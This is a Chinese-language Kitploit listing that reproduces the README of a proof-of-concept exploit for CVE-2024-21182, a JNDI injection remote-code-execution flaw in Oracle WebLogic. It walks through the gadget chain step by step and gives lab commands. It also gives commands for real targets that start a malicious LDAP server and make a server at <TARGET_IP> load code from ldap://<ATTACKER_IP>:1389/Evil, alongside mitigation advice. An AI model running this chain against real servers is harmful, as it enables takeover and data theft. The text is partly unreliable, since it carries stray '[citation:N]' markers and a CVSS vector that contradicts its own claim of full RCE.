Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-21182---Oracle-WebLogic-Server-JNDI-Injection-RCE — 针对CVE-2024-21182的概念验证利用程序,通过T3/IIOP协议在Oracle WebLogic Server中实现未经认证的JNDI注入,导致远程代码执行。包含用于测试的Docker实验环境。 | Kitploit
工具/GitHubGitHub/fevar54/cve-2024-21182---oracle-weblogic-server-jndi-injection-rce
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育Payload 开发实验室与实践
GitHubfevar54/cve-2024-21182---oracle-weblogic-server-jndi-injection-rce

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →

CVE-2024-21182---Oracle-WebLogic-Server-JNDI-Injection-RCE

针对CVE-2024-21182的概念验证利用程序,通过T3/IIOP协议在Oracle WebLogic Server中实现未经认证的JNDI注入,导致远程代码执行。包含用于测试的Docker实验环境。

查看仓库
183个月前尚未审核
分享

CVE-2024-21182 - Oracle WebLogic Server JNDI 注入 → 远程代码执行

CVE-2024-21182 - Oracle WebLogic Server JNDI 注入 → 远程代码执行

CVE-2024-21182 CVSS CISA KEV

📋 描述

CVE-2024-21182 是一个未经身份验证的 JNDI 注入漏洞,影响 Oracle WebLogic Server 的 Core 组件。攻击者可通过 T3 或 IIOP 协议远程执行任意代码(RCE),从而完全获取服务器上的所有数据[citation:5][citation:8][citation:9]。

本仓库包含一个功能完整的 PoC(概念验证),展示了如何利用 AggregatableOpaqueReference + MessageDestinationReference 小工具链绕过 CVE-2023-21839 的补丁[citation:2][citation:4]。

🚨 漏洞详情

属性值
CVECVE-2024-21182
产品Oracle WebLogic Server (Core)
受影响版本12.2.1.4.0 和 14.1.1.0.0[citation:7]
可用补丁Oracle 关键补丁更新(2024年7月和2024年10月)[citation:6]
CISA KEV 状态确认活跃利用(添加于 2026-01-06)[citation:3][citation:8]
CISA 缓解截止日期2026-04-06[citation:8]

攻击向量

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

  • 网络 (AV:N):可远程利用
  • 低复杂度 (AC:L):无需特殊条件
  • 无需认证 (PR:N):匿名访问
  • 无需用户交互 (UI:N):被动利用

⚙️ 攻击阶段

阶段 1:侦察:识别暴露 T3/IIOP 端口(7001)的 WebLogic 服务器。

阶段 2:分析:判断服务器是否运行受影响版本(12.2.1.4.0 或 14.1.1.0.0)或缺少 2024年10月补丁。

阶段 3:利用(技术流程):

  1. 构建小工具:攻击者创建一个 AggregatableOpaqueReference 对象[citation:2]。
  2. 引用注入:通过 Java 反射修改该对象的私有字段 referent,使其指向一个恶意的 MessageDestinationReference[citation:4]。
  3. 绑定与查找:将恶意对象“绑定”到服务器的 JNDI 树中,然后进行“查找”。
  4. JNDI 解析:查找时,服务器向攻击者控制的 URL(LDAP 服务器)发起新的 JNDI 查询。
  5. LDAP 服务器:响应一个引用,指向攻击者 HTTP 服务器上托管的 Java 代码。
  6. 代码执行:WebLogic 服务器下载并实例化该 Java 类,在受害者机器上下文中执行其内容。

🛠️ 先决条件

  • Docker 和 Docker Compose:用于搭建隔离测试环境[citation:2]。
  • JDK 8 或更高版本:用于编译和运行 T3 客户端。
  • WebLogic T3 客户端 JAR:wlthint3client.jar(可从 WebLogic 安装目录提取)。

🚀 PoC 使用方法

实验室环境(Docker)

# 1. 克隆仓库
git clone https://github.com/your-username/CVE-2024-21182.git
cd CVE-2024-21182

# 2. 启动实验环境(受害者 + 攻击者)
docker-compose up -d

# 3. 执行自动利用
./validate.sh

针对真实目标的利用(需授权)

# 1. 启动恶意 LDAP/HTTP 服务器
python3 exploit/ldap_server.py

# 2. 在另一个终端中执行 Java 负载
javac -cp ".:wlthint3client.jar" poc/CVE_2024_21182.java
java -cp ".:wlthint3client.jar" CVE_2024_21182 t3://<TARGET_IP>:7001 ldap://<ATTACKER_IP>:1389/Evil

📊 演示影响

  • 服务器远程命令执行(RCE)
  • 未授权访问应用程序关键数据
  • 完全控制应用服务器
  • 潜在的企业网络横向移动入口
  • 部署勒索软件或其他恶意载荷的基础

根据 CISA 当前状态:“是否已知用于勒索软件活动?未知”(但通常此类中间件的 RCE 是勒索软件入侵的初始向量)。

🛡️ 缓解措施

  • 立即修补:应用 Oracle 2024年10月或之后的关键补丁更新。
  • 网络限制:仅允许可信来源访问 T3/IIOP 端口(例如 7001)。
  • 监控:检测 JNDI 树中异常的绑定/查找尝试。

⚠️ 法律声明

此代码仅供教育和研究目的。未经明确授权,滥用此 PoC 对付系统是违法的。作者不对任何误用此信息的行为负责。

📚 参考资料

  • NVD - CVE-2024-21182
  • CISA KEV 目录
  • Oracle 安全公告
  • 原始技术分析

🤝 致谢

  • 发现该小工具链的原始研究人员
  • dinosn 提供了可复现的 Docker 实验室环境
下载工具